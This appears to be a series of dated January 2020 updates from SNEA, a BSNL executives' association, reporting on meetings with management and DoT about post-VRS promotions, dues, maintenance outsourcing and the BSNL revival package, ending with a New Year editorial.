Clearing of pending dues of recoveries from the Salary of the employees: CMD informed that the payment of the GPF recoveries in respect of VRS optees, about Rs.710 Crore will be released on Monday. Other dues will also be cleared at the earliest.

Promotions to fill up vacant posts after VRS: Regarding Promotions, CMD is of the opinion that employees should forget promotions for at least one year and work hard for the Revival of BSNL. Also opined that more merit is to be introduced in promotions in future. We explained the ground realities. Almost all DGM posts in Telecom & Finance Wings as well as AGM & CAOs posts will become vacant after 31.01.2020 and it will become difficult to run BSNL thereafter without filling up these vacant posts on immediate basis. There is stagnation in the Cadres of JTO and SDE and their promotions cannot be delayed. At the time of recruitment of JTOs & JAOs as well as in promotions from JTO to SDE, the competitive examination is available and practically 50% Executives eligible at the time of promotion are from competitive quota only, we explained. CMD BSNL agreed about the shortage in AGM, CAO and DGM posts after post-VRS 2019.

Farewell to the retiring employees: On recognition of the services of the retirees, we requested to restore the amount of Rs 3001/- as it is just a token of appreciation of their past services in BSNL and honour for them. CMD informed his inability due to the cash crunch in BSNL. In that case, we suggested some alternative arrangement like recharge coupons equal to that amount. CMD appreciated our suggestion and agreed to look into the alternative instead of Cash Award.

Allotment of USOF Projects to BSNL on Nomination Basis: We appraised CMD BSNL regarding the allotment of USOF Projects to BSNL on Nomination Basis. CMD BSNL mentioned that we have to do all the Govt. Projects/ USOF Projects and our performance during previous years was very good and we have completed the Govt. Projects within the time frame. However, we feel that if it is given on Nomination Basis, it will be good for BSNL otherwise if we compete through tender, it may not be beneficial for BSNL.

Maintenance of Primary Cables: We further appraised CMD about the difficulties faced by the Executives and various Circles in Post-VRS Scenario in maintaining the Primary Cables since the orders for maintenance of Primary Cable for outsourcing has not been issued by the Corporate Office. CMD BSNL mentioned that due to the developmental works going on in various States, the Primary Cable has to be replaced/ maintained frequently by taking the permission from various Local State Govt. Bodies/ Highway Authorities for which the Tenderer may not come forward and our maintenance work will be suffered badly.

Maintenance of MDF: We pleaded with the CMD BSNL that the control of MDF should be within BSNL Staff. CMD BSNL mentioned that our young staff should come forward, grab the important works and take responsibility. CMD further mentioned that due to shortage of staff in post VRS scenario it may not be possible to maintain MDF round the clock by the BSNL Staff. After detail discussion, CMD assure to review the situation after three months.

08-01-2020

08-01-2020

SNEA extends solidarity and moral support to the General Strike by the Central Trade Unions on 08.01.2020 against Privatization of Public Sector and other demands

07-01-2020

07-01-2020

Circle Executive Committee meeting of Assam Circle was held at Guwahati on 04.01.2020. GS and Jt Sec(East) addressed the extended CEC meeting. CHQ leaders recollected the contribution of the senior leaders and the activists taken the VRS. They lead the Association during various struggles for settlement of different demands and their contribution will be remembered for ever. All the dues will be settled by 31.01.2020 and their parting with BSNL will be smooth.

Ultimately our struggle for years together brought good results for BSNL. Management and Govt tried to suppress our struggle by many means, by pay cuts, charge sheets, show cause notices etc etc but we never compromised. Finally our struggle brought out 4G spectrum free of cost as we demanded, land monetization approved, entire expenditure of VRS borne by the Govt, 8500 Cr bond with sovereign guarantee approved to give financial support etc.

Our main focus is on revival of BSNL. 4G launching is planned for 01.03.2020. The tariff is increasing which is a good sign for the industry and BSNL. If management is able to implement a good mechanism taking the employees into confidence, Revival is very much possible. Everything depends on the management.

At Corporate level, BSNL restructuring is going on. In the changed scenario, guidelines are issued for outsourcing of CFA work. However we are afraid that due to the stringent conditions, it may fail in many places and BSNL will be in big trouble in maintaining the services after 01.02.2020, we informed the management. The experienced labours may not be able to participate in the tender. Similar work is going on in other verticals also.

As we afraid, in HR vertical, the number of posts is coming down drastically by restructuring. VRS thrown various challenges and post reduction and promotion is one among them. The threat of post reduction was there for many years and in anticipation of that, Association worked out a non-post based promotion policy well in advance. Now our entire focus is for its early implementation w.e.f the due date of 01.07.2018.

Unfortunately, some Executive Assn is still demanding post based promotion from a prospective date (for few vacancies) and helping the management to stop the implementation of the new promotion policy. Management is not giving post based promotion in the name of contempt and restructuring and at the same time not implementing the new policy. All are eligible for promotion from 01.07.18 itself but they are insisting for promotion from a prospective date! The opportunity we got last year for SDE promotion for all the SDE posts spoiled by them by the adamant attitude on contempt petition and the demand for personal appearance of CMD and GM(Pers) in the CAT/Ernakulam.

The new promotion will benefit all the Executives, ensuring a smooth career progression upto AGM Grade. All the JTOs upto 2014 can become SDEs and all the SDEs upto 2016 can become Sr SDE/Sr AO or AGM/CAO as of now. Past service weightage is provided in the new policy. By that, promotion from SDE/AO to Sr SDE/Sr AO Grade will be in 3 years and SDE/AO to AGM/CAO promotion in 8 years which cannot be dreamed in the changed scenario. After VRS, the number of posts in all the cadres will come down drastically.

By sustained struggle and continuous persuation, we could settle many issues in the past. In 2018 we could give record number of promotions, never heard in the history of BSNL or DoT. Specific issues of the BSNL direct rect employees like i) EPF contribution without the ceiling, ii) 5% Superannuation benefit etc could settle. We will continue our efforts to settlement of the remaining issues with the support of all.

06-01-2020

Circle Executive Committee meeting of Assam Circle was held at Guwahati on 04.01.2020. GS and Jt Sec(East) attended and addressed the meeting. The CEC unanimously co-opted the following Circle Office bearers:

Circle President: Com Suresh Bora, AGM.

Circle Secretary: Com Borun Baruah, JTO.

Treasurer: Com Allauddin Ahmed, AO.

The cooption become necessary as the earlier OBs opted for VRS 2019. SNEA recognises their contribution for many years and wish them all the best.

SNEA CHQ wishes all the success for the newly elected young team.

03-01-2020

View Media Reports:

The state-controlled Bharat Sanchar Nigam Limited (BSNL) continues to be at a receiving end following bureaucratic uncertainties leading to an erosion of potential revenue opportunities on the back of Rs 20,000 crore-strong mega connectivity programs despite the Centre’s thrust to revive the stressed telco.  

03-01-2020

03-01-2020

Interaction with the Consultant M/s Deloitte:

BSNL management arranged a meeting with the Consultant M/s Deloitte appointed for giving recommendations on continuity in BSNL services in the posts VRS scenario and the short term measures on 02.01.2020.

GS, President and both AGSs made a detailed discussion with the consultant for about two hours from 1600 Hrs to 1800 Hrs focussing on all the issues that may crop up in the post VRS scenario. The consultant identified acute shortage in DGM, AGM and TT(TM) cadres that will have impact after the VRS.

Discussions focussed on the ground realities in field units, how it is going to affect after VRS, immediate measures to be taken to reduce the impact, customer relation in the post VRS scenario, merger of SSA and Circle, drawback of present BA structure, manpower requirement, motivation of staff etc etc.

02-01-2020

02-01-2020

GS, President and AGSs met Secretary/DoT, Member(T)/DoT, Addl Secretary/DoT, CMD, DIR(HR), DIR(Fin), Jt Sec/DoT and other senior Officers of DoT on 01.01.2020, the new year and held brief discussions. Discussions with CMD and DIR(HR) on important issues like restructuring and promotion is fixed for next week due to their busy schedule.

During meeting with Secretary/DoT we raised the issue of DGM(T) promotion which is stopped due to the reply given by Secretary/DoT in the meeting with the Parliamentary Committee that DGM promotion can be issued only after completion of restructuring (ie. after VRS). We explained that all the eligible DEs are getting promotion and there is no reservation involved in DE to DGM promotion and all the 287 DEs belongs to SC/ST category also getting covered. Among the DEs, more than 500 DEs applied for VRS and will miss the promotion if it is issued after 31.01.2020. We further bring to his notice that on 30.12.2019, even the CGM rank officers retiring on 31.12.2019 are given promotion and allowed to avail the promotion. But in the case of BSNL Executives just reverse happening.

After discussion Secretary informed that he is agreeable for DGM promotion provided: 1) it is not making any financial implications just before VRS and 2) it does not create any issue in similar cadres. We explained that it does not have any financial implications and all are working in higher scales and will not create any issue in similar cadres as DGM promotion is held up after 2017 due to litigations.

Then Secretary assured us to discuss with CMD and if the information is correct, he will give permission for DGM promotion.

01-01-2020

01-01-2020

Editorial

2019: Turbulent period in the history of BSNL. We successfully overcome it with unprecedented Unity and Solidarity

New Year unfolds new hopes with new challenges

In 2019, we had gone through turbulent times, never witnessed in the history of BSNL with agitations one after another demanding Revival of BSNL. It was really a do or die battle for the BSNL employees. Each and every committed member of SNEA dedicated the whole one year for the Revival of BSNL as each and every right thinking BSNL Executive was aware of the fact that his future is fully depending upon the future of BSNL. Unfortunately during this crucial period also some section of employees, especially some Executives kept away from the mainstream struggles as if collapse of BSNL is nothing to do with them. They have to realise the mistakes and join the mainstream, otherwise the Executives are to take a call to strengthen the mainstream, leaving those negative forces.

Yes, we had witnessed Repressive measures unleashed by the management and the Govt against the Associations and Unions to compel them to stop the agitations and struggles, allowing BSNL for its natural death by accepting defeat. But we never relented as we were made out of different stuff, ready for any sacrifice and ready to fight to the end, till we achieve our goal. Yes, it was a do or die battle for all of us which we have to win at any cost.

Initially, the Government was not at all serious on Revival of BSNL. All the Ministries were opposing the Revival Plan. Govt was waiting for the natural death of BSNL. Finance Ministry was so hostile, opposing any type of Revival package and insisting for the closure of BSNL and MTNL. Struggle, side by side with the successful efforts of BSNL employees to create public and media opinion in favour of BSNL Revival really worked wonders. SNEA was in the forefront of all such activities. The compulsion created by us for political intervention finally worked. Sincere efforts of Hon MoC and his efforts to form the GoM with the Home Minister as its Chairman coupled with the sincere efforts of both Secretaries/DoT and both CMDs/BSNL made things happen. Our efforts for the intervention of Hon Prime Minister and the final call by the Hon Prime Minister himself to give a good Revival package that will really help revival of BSNL was the most decisive factor.

Finally the BSNL and MTNL revival package was approved by Union Cabinet on 23.10.2019, giving a new lease of life to BSNL and MTNL. The package is having the real potential for the Revival of BSNL. 4G spectrum charges of Rs 14,155 Crores plus 18% GST will be borne by the Govt as demanded by us. From the beginning, AUAB demanded that Govt should allot free 4G spectrums to BSNL. Land monetization for clearing the liabilities and meeting the CAPEX also got the Cabinet approval. Our demand for financial assistance also materialised in the form of long term bond of 10 years for 15,000 Cr for BSNL and MTNL with Government sovereign guarantee. Our concern for merger of MTNL with BSNL, i.e. the huge financial liability, its status as a listed company and complex HR issues, are getting addressed before the merger takes place. The entire liability of about 15,000 Crores for VRS is borne by the Government as we were opposing any additional financial burden on BSNL in the name of VRS. Allotment of 5G spectrum is another favourable decision in the offing.

Each and every employee of BSNL, especially the Comrades of SNEA can cherish on this marvellous achievement, creating another history in the Trade Union movement. Yes Comrades, we created history by struggling shoulder to shoulder with other employees, for the Revival of the company, setting an example for other sectors. I am very proud and fortunate to be part of such a struggle and lead an Association of committed members by spearheading the struggle in the banner of AUAB, in the most difficult period. These are the memorable moments in life.

Now, we are at the doorsteps of 2020 with lot of hopes and expectations. We are looking for positivity in BSNL. BSNL revival is the first among them.

4G launching on pan India basis on the allotted spectrum should not be delayed. The customers are eagerly waiting for that moment. Equally BSNL is answerable to the Govt also after the allotment of free 4G spectrum. Modernization of the network is to be expedited. Operational issues and clearing the outstanding dues to the labours, contractors, vendors, land owners etc are the immediate challenges to make any outsourcing model successful. BSNL has to regain the confidence among them by clearing their dues which will open the road for the future. Realizing the money through sovereign bond and land monetization are two important measures in that direction. Management has to come out of the VRS syndrome and start working on these issues to make it sure that BSNL is continue to provide uninterrupted services after 31.01.2020. Large number of loyal customers are really worried about the massive voluntary retirement and it is our responsibility to regain their confidence in the post VRS scenario. In this regard, management decisions will be very crucial.

In addition to the above issues, how management is going to motivate the remaining 47% employees to take the entire workload in the post VRS situation, how they are filling up the vacuum created in the field units which is generating revenue etc will have huge impact on the efforts for the revival of BSNL. The shortage of Executives in higher level can be easily met by promotion which can be done within couple of days by the new policy, simply by taking VC.

No more excuses can be made by DoT/Government and BSNL management in the name of employee cost as more than 50% employees took VRS, exceeding their target. We already warned management that unprofessional and drastic reduction in the Executives strength will have adverse impact on the BSNL revival and good workers are to be retained in BSNL. All depends on how management is utilizing the remaining employees gainfully in the post VRS scenario. A professional approach and quick policy decisions can once again bring BSNL back on track.

Let us hope that 2020 will bring good news for BSNL and the entire nation.